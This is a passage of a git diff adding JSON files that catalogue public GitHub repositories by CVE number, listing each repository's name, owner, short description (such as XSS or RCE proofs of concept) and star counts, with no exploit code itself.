+ "html_url": "https:\/\/github.com\/visudade"
+ },
+ "html_url": "https:\/\/github.com\/visudade\/CVE-2023-43622",
+ "description": "CVE-2023–43622",
+ "fork": false,
+ "created_at": "2024-05-29T13:04:29Z",
+ "updated_at": "2024-05-29T13:19:21Z",
+ "pushed_at": "2024-05-29T13:19:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43654.json b/2023/CVE-2023-43654.json
new file mode 100644
index 0000000000..0fb1500e44
--- /dev/null
+++ b/2023/CVE-2023-43654.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 699309813,
+ "name": "ShellTorchChecker",
+ "full_name": "OligoCyberSecurity\/ShellTorchChecker",
+ "owner": {
+ "login": "OligoCyberSecurity",
+ "id": 102041143,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102041143?v=4",
+ "html_url": "https:\/\/github.com\/OligoCyberSecurity"
+ },
+ "html_url": "https:\/\/github.com\/OligoCyberSecurity\/ShellTorchChecker",
+ "description": "A tool that checks if a TorchServe instance is vulnerable to CVE-2023-43654",
+ "fork": false,
+ "created_at": "2023-10-02T11:33:37Z",
+ "updated_at": "2024-04-21T14:44:24Z",
+ "pushed_at": "2024-04-21T14:44:21Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43667.json b/2023/CVE-2023-43667.json
new file mode 100644
index 0000000000..b028b79f08
--- /dev/null
+++ b/2023/CVE-2023-43667.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 786209657,
+ "name": "CVE-2023-43667-2",
+ "full_name": "miguelc49\/CVE-2023-43667-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:45Z",
+ "updated_at": "2024-04-14T17:40:52Z",
+ "pushed_at": "2024-04-15T23:51:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209678,
+ "name": "CVE-2023-43667-1",
+ "full_name": "miguelc49\/CVE-2023-43667-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:51Z",
+ "updated_at": "2024-04-14T17:40:49Z",
+ "pushed_at": "2024-04-15T23:51:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209696,
+ "name": "CVE-2023-43667-3",
+ "full_name": "miguelc49\/CVE-2023-43667-3",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-3",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:57Z",
+ "updated_at": "2024-04-14T17:40:59Z",
+ "pushed_at": "2024-04-15T23:51:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43757.json b/2023/CVE-2023-43757.json
new file mode 100644
index 0000000000..df364582d1
--- /dev/null
+++ b/2023/CVE-2023-43757.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 764535638,
+ "name": "CVE-2023-43757",
+ "full_name": "sharmashreejaa\/CVE-2023-43757",
+ "owner": {
+ "login": "sharmashreejaa",
+ "id": 161574704,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161574704?v=4",
+ "html_url": "https:\/\/github.com\/sharmashreejaa"
+ },
+ "html_url": "https:\/\/github.com\/sharmashreejaa\/CVE-2023-43757",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-28T08:58:31Z",
+ "updated_at": "2024-02-28T08:58:31Z",
+ "pushed_at": "2024-02-28T08:58:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43770.json b/2023/CVE-2023-43770.json
new file mode 100644
index 0000000000..8752defb84
--- /dev/null
+++ b/2023/CVE-2023-43770.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 697409473,
+ "name": "CVE-2023-43770-POC",
+ "full_name": "s3cb0y\/CVE-2023-43770-POC",
+ "owner": {
+ "login": "s3cb0y",
+ "id": 43054353,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43054353?v=4",
+ "html_url": "https:\/\/github.com\/s3cb0y"
+ },
+ "html_url": "https:\/\/github.com\/s3cb0y\/CVE-2023-43770-POC",
+ "description": "A Proof-Of-Concept for the CVE-2023-43770 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-27T17:08:23Z",
+ "updated_at": "2024-05-27T08:15:49Z",
+ "pushed_at": "2023-10-02T17:41:10Z",
+ "stargazers_count": 30,
+ "watchers_count": 30,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 30,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 697793875,
+ "name": "CVE-2023-43770-PoC",
+ "full_name": "knight0x07\/CVE-2023-43770-PoC",
+ "owner": {
+ "login": "knight0x07",
+ "id": 60843949,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60843949?v=4",
+ "html_url": "https:\/\/github.com\/knight0x07"
+ },
+ "html_url": "https:\/\/github.com\/knight0x07\/CVE-2023-43770-PoC",
+ "description": "PoC for Stored XSS (CVE-2023-43770) Vulnerability",
+ "fork": false,
+ "created_at": "2023-09-28T13:43:25Z",
+ "updated_at": "2023-12-18T12:45:24Z",
+ "pushed_at": "2023-09-28T16:22:28Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43786.json b/2023/CVE-2023-43786.json
new file mode 100644
index 0000000000..4d15cefb3d
--- /dev/null
+++ b/2023/CVE-2023-43786.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744195023,
+ "name": "jfrog-CVE-2023-43786-libX11_DoS",
+ "full_name": "jfrog\/jfrog-CVE-2023-43786-libX11_DoS",
+ "owner": {
+ "login": "jfrog",
+ "id": 499942,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4",
+ "html_url": "https:\/\/github.com\/jfrog"
+ },
+ "html_url": "https:\/\/github.com\/jfrog\/jfrog-CVE-2023-43786-libX11_DoS",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-16T20:04:05Z",
+ "updated_at": "2024-01-16T20:04:05Z",
+ "pushed_at": "2024-01-17T05:57:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43804.json b/2023/CVE-2023-43804.json
new file mode 100644
index 0000000000..a8a73c4086
--- /dev/null
+++ b/2023/CVE-2023-43804.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 704378342,
+ "name": "CVE-2023-43804-Exploit",
+ "full_name": "JawadPy\/CVE-2023-43804-Exploit",
+ "owner": {
+ "login": "JawadPy",
+ "id": 98477272,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98477272?v=4",
+ "html_url": "https:\/\/github.com\/JawadPy"
+ },
+ "html_url": "https:\/\/github.com\/JawadPy\/CVE-2023-43804-Exploit",
+ "description": "Example of how CVE-2023-43804 works with real python code.",
+ "fork": false,
+ "created_at": "2023-10-13T06:15:45Z",
+ "updated_at": "2024-04-17T11:59:24Z",
+ "pushed_at": "2023-10-13T07:19:49Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43838.json b/2023/CVE-2023-43838.json
new file mode 100644
index 0000000000..1b3b39a601
--- /dev/null
+++ b/2023/CVE-2023-43838.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 699413146,
+ "name": "CVE-2023-43838",
+ "full_name": "rootd4ddy\/CVE-2023-43838",
+ "owner": {
+ "login": "rootd4ddy",
+ "id": 129632649,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129632649?v=4",
+ "html_url": "https:\/\/github.com\/rootd4ddy"
+ },
+ "html_url": "https:\/\/github.com\/rootd4ddy\/CVE-2023-43838",
+ "description": "Public disclosure for CVE-2023-31584.",
+ "fork": false,
+ "created_at": "2023-10-02T15:27:07Z",
+ "updated_at": "2023-11-28T01:28:13Z",
+ "pushed_at": "2023-10-02T15:32:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43871.json b/2023/CVE-2023-43871.json
new file mode 100644
index 0000000000..78e07416c0
--- /dev/null
+++ b/2023/CVE-2023-43871.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693581070,
+ "name": "CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media",
+ "full_name": "sromanhu\/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media",
+ "description": "WBCE 1.6.1 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up",
+ "fork": false,
+ "created_at": "2023-09-19T10:02:34Z",
+ "updated_at": "2023-09-28T22:37:30Z",
+ "pushed_at": "2023-09-19T10:07:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43872.json b/2023/CVE-2023-43872.json
new file mode 100644
index 0000000000..f17a8aed1e
--- /dev/null
+++ b/2023/CVE-2023-43872.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693577949,
+ "name": "CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager",
+ "full_name": "sromanhu\/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager",
+ "description": "CMSmadesimple 2.2.18 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up",
+ "fork": false,
+ "created_at": "2023-09-19T09:54:42Z",
+ "updated_at": "2023-09-28T22:45:40Z",
+ "pushed_at": "2023-09-19T10:00:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43873.json b/2023/CVE-2023-43873.json
new file mode 100644
index 0000000000..f9ff223d62
--- /dev/null
+++ b/2023/CVE-2023-43873.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693584148,
+ "name": "CVE-2023-43873-e107-CMS-Stored-XSS---Manage",
+ "full_name": "sromanhu\/CVE-2023-43873-e107-CMS-Stored-XSS---Manage",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43873-e107-CMS-Stored-XSS---Manage",
+ "description": "e107 2.3.2 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Name field in the Manage Menu.",
+ "fork": false,
+ "created_at": "2023-09-19T10:10:13Z",
+ "updated_at": "2023-09-28T22:37:59Z",
+ "pushed_at": "2023-09-19T10:31:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43874.json b/2023/CVE-2023-43874.json
new file mode 100644
index 0000000000..0c23049bb2
--- /dev/null
+++ b/2023/CVE-2023-43874.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693589060,
+ "name": "CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags",
+ "full_name": "sromanhu\/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags",
+ "description": "e107 2.3.2 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Copyright and Author field in the Meta & Custom Tags Menu.",
+ "fork": false,
+ "created_at": "2023-09-19T10:23:08Z",
+ "updated_at": "2023-09-28T22:38:18Z",
+ "pushed_at": "2023-09-19T10:29:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43875.json b/2023/CVE-2023-43875.json
new file mode 100644
index 0000000000..85c69843af
--- /dev/null
+++ b/2023/CVE-2023-43875.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693884199,
+ "name": "CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation",
+ "full_name": "sromanhu\/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation",
+ "description": "Subrion CMS 4.2.1 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.",
+ "fork": false,
+ "created_at": "2023-09-19T22:58:33Z",
+ "updated_at": "2023-09-28T22:38:33Z",
+ "pushed_at": "2023-09-19T23:03:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43876.json b/2023/CVE-2023-43876.json
new file mode 100644
index 0000000000..c01793a4c7
--- /dev/null
+++ b/2023/CVE-2023-43876.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693885753,
+ "name": "CVE-2023-43876-October-CMS-Reflected-XSS---Installation",
+ "full_name": "sromanhu\/CVE-2023-43876-October-CMS-Reflected-XSS---Installation",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43876-October-CMS-Reflected-XSS---Installation",
+ "description": "October CMS 3.4.16 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.",
+ "fork": false,
+ "created_at": "2023-09-19T23:05:11Z",
+ "updated_at": "2023-09-28T22:38:47Z",
+ "pushed_at": "2023-09-19T23:08:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43877.json b/2023/CVE-2023-43877.json
new file mode 100644
index 0000000000..3f02f0835f
--- /dev/null
+++ b/2023/CVE-2023-43877.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695139320,
+ "name": "CVE-2023-43877-RiteCMS-Stored-XSS---Home",
+ "full_name": "sromanhu\/CVE-2023-43877-RiteCMS-Stored-XSS---Home",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43877-RiteCMS-Stored-XSS---Home",
+ "description": " RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Home settings page in the Administration Menu",
+ "fork": false,
+ "created_at": "2023-09-22T12:47:49Z",
+ "updated_at": "2023-09-28T22:42:34Z",
+ "pushed_at": "2023-09-22T13:04:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43878.json b/2023/CVE-2023-43878.json
new file mode 100644
index 0000000000..0b7b468afc
--- /dev/null
+++ b/2023/CVE-2023-43878.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695147163,
+ "name": "CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu",
+ "full_name": "sromanhu\/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu",
+ "description": "RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Main Menu - Items in the Administration Menu",
+ "fork": false,
+ "created_at": "2023-09-22T13:07:44Z",
+ "updated_at": "2023-09-28T22:43:03Z",
+ "pushed_at": "2023-09-22T13:12:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43879.json b/2023/CVE-2023-43879.json
new file mode 100644
index 0000000000..75be3569f9
--- /dev/null
+++ b/2023/CVE-2023-43879.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695149706,
+ "name": "CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent",
+ "full_name": "sromanhu\/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent",
+ "description": "About RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Global Content Blocks in the Administration Menu",
+ "fork": false,
+ "created_at": "2023-09-22T13:14:02Z",
+ "updated_at": "2023-09-28T22:43:22Z",
+ "pushed_at": "2023-09-22T13:17:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43955.json b/2023/CVE-2023-43955.json
new file mode 100644
index 0000000000..cc4e056323
--- /dev/null
+++ b/2023/CVE-2023-43955.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 689433745,
+ "name": "com.phlox.tvwebbrowser",
+ "full_name": "actuator\/com.phlox.tvwebbrowser",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.phlox.tvwebbrowser",
+ "description": "CVE-2023-43955",
+ "fork": false,
+ "created_at": "2023-09-09T19:41:46Z",
+ "updated_at": "2024-01-17T19:59:18Z",
+ "pushed_at": "2023-11-07T16:45:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-43955"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44061.json b/2023/CVE-2023-44061.json
new file mode 100644
index 0000000000..ee84970b67
--- /dev/null
+++ b/2023/CVE-2023-44061.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695430538,
+ "name": "CVE-2023-44061",
+ "full_name": "soundarkutty\/CVE-2023-44061",
+ "owner": {
+ "login": "soundarkutty",
+ "id": 26168410,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4",
+ "html_url": "https:\/\/github.com\/soundarkutty"
+ },
+ "html_url": "https:\/\/github.com\/soundarkutty\/CVE-2023-44061",
+ "description": " CVE-2023-44061 - Simple and Nice Shopping Cart Script V1.0",
+ "fork": false,
+ "created_at": "2023-09-23T06:45:32Z",
+ "updated_at": "2023-09-28T03:40:09Z",
+ "pushed_at": "2023-09-23T13:50:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4427.json b/2023/CVE-2023-4427.json
new file mode 100644
index 0000000000..553fecb02c
--- /dev/null
+++ b/2023/CVE-2023-4427.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753386331,
+ "name": "CVE-2023-4427",
+ "full_name": "tianstcht\/CVE-2023-4427",
+ "owner": {
+ "login": "tianstcht",
+ "id": 32213198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32213198?v=4",
+ "html_url": "https:\/\/github.com\/tianstcht"
+ },
+ "html_url": "https:\/\/github.com\/tianstcht\/CVE-2023-4427",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-06T02:29:06Z",
+ "updated_at": "2024-05-19T16:33:33Z",
+ "pushed_at": "2024-02-06T02:59:15Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44451.json b/2023/CVE-2023-44451.json
new file mode 100644
index 0000000000..1adc8e7364
--- /dev/null
+++ b/2023/CVE-2023-44451.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744352278,
+ "name": "slippy-book-exploit",
+ "full_name": "febinrev\/slippy-book-exploit",
+ "owner": {
+ "login": "febinrev",
+ "id": 52229330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4",
+ "html_url": "https:\/\/github.com\/febinrev"
+ },
+ "html_url": "https:\/\/github.com\/febinrev\/slippy-book-exploit",
+ "description": " CVE-2023-44451, CVE-2023-52076: RCE Vulnerability affected popular Linux Distros including Mint, Kali, Parrot, Manjaro etc. EPUB File Parsing Directory Traversal Remote Code Execution",
+ "fork": false,
+ "created_at": "2024-01-17T05:50:38Z",
+ "updated_at": "2024-06-17T18:26:57Z",
+ "pushed_at": "2024-01-17T10:42:12Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44452.json b/2023/CVE-2023-44452.json
new file mode 100644
index 0000000000..f4cbb87276
--- /dev/null
+++ b/2023/CVE-2023-44452.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744427098,
+ "name": "atril_cbt-inject-exploit",
+ "full_name": "febinrev\/atril_cbt-inject-exploit",
+ "owner": {
+ "login": "febinrev",
+ "id": 52229330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4",
+ "html_url": "https:\/\/github.com\/febinrev"
+ },
